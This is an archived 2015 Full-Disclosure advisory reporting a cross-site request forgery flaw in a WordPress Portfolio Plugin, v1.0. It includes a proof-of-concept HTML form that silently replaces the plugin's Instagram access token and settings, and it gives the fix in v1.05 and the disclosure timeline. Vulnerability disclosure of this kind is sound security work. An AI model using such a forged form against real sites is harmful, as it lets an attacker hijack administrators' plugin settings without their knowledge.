lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Mon, 20 Jul 2015 01:11:02 +0000
From: Nitin Venkatesh <>
To: "" <>
Subject: [FD] Cross-Site Request Forgery Vulnerability in Portfolio Plugin
 Wordpress Plugin v1.0

# Title: Cross-Site Request Forgery Vulnerability in Portfolio Plugin
Wordpress Plugin v1.0
# Submitter: Nitin Venkatesh
# Product: Portfolio Plugin Wordpress Plugin
# Product URL:
# Vulnerability Type: Cross-site Request Forgery [CWE-352]
# Affected Versions: v1.0
# Tested versions: v1.0
# Fixed Version: v1.05
# Link to code diff:
# Changelog:
# CVE Status: None/Unassigned/Fresh

## Product Information:

Use Instagram to display your portfolio. Choose whether to display all
images from your account, or only the ones you tag with a custom hashtag.

## Vulnerability Description:

The admin form in Portfolio Plugin v1.0 is susceptible to CSRF.

## Proof of Concept:

<form action="
<input type="hidden" name="wplw_form_submitted" value='Y' />
<input type="hidden" name="wplw_instagram_access_token" value='evil-token1'
<input type="hidden" name="wplw_instagram_userID" value='nitstorm' />
<input type="hidden" name="wplw_hashtag" value='csrf' />
<input type="hidden" name="wplw_settings_submit" value='Save' />
<input type="submit" value="submit" />

## Solution:

Upgrade to v1.05 or later.

## Disclosure Timeline:

2015-06-03 - Discovered. Mailed developer.
2015-06-05 - Updated v1.05 released.
2015-07-20 - Publishing disclosure on FD mailing list.

## Disclaimer:

This disclosure is purely meant for educational purposes. I will in no way
be responsible as to how the information in this disclosure is used.

Sent through the Full Disclosure mailing list
Web Archives & RSS:

Powered by blists - more mailing lists